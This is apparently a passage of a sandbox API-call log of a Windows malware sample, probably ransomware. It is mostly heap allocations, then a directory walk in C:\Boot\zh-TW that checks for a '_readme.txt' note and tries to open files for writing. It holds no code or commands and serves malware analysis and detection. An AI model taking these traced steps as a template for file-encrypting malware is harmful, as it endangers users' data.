[0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.287] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0097.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.288] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.288] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.288] PathFindFileNameW (pszPath="") returned="" [0097.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.288] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.288] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.289] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.289] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0097.289] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0097.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.289] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0097.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.290] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.290] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.290] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.290] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0097.290] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.291] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b06900, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.291] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned=".txt" [0097.291] HeapFree (in: hHeap=0x630000, 